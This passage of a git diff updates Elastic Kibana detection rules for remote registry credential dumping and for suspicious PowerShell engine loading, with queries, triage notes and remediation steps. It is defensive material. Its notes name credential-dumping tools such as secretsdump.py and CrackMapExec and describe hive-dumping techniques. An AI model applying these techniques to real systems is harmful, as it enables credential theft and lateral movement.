ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json index 25e19bef885..4b76b6b37a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_109.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json index f41553a61b3..597d1f6406a 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n \"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json index b61aa3e4d87..2eab8fa63d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n \"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"Ssms.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json index a53ab0a8034..0a9f8c79d3c 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PowerShell Engine ImageLoad", - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\") or\n file.name : (\"System.Management.Automation.ni.dll\", \"System.Management.Automation.dll\")) and\n\n/* add false positives relevant to your environment here */\nnot process.executable : (\"C:\\\\Windows\\\\System32\\\\RemoteFXvGPUDisablement.exe\", \"C:\\\\Windows\\\\System32\\\\sdiagnhost.exe\") and\nnot process.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\*\\.exe\"\"\" and\n not process.name :\n (\n \"Altaro.SubAgent.exe\",\n \"AppV_Manage.exe\",\n \"azureadconnect.exe\",\n \"CcmExec.exe\",\n \"configsyncrun.exe\",\n \"choco.exe\",\n \"ctxappvservice.exe\",\n \"DVLS.Console.exe\",\n \"edgetransport.exe\",\n \"exsetup.exe\",\n \"forefrontactivedirectoryconnector.exe\",\n \"InstallUtil.exe\",\n \"JenkinsOnDesktop.exe\",\n \"Microsoft.EnterpriseManagement.ServiceManager.UI.Console.exe\",\n \"mmc.exe\",\n \"mscorsvw.exe\",\n \"msexchangedelivery.exe\",\n \"msexchangefrontendtransport.exe\",\n \"msexchangehmworker.exe\",\n \"msexchangesubmission.exe\",\n \"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n \"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n 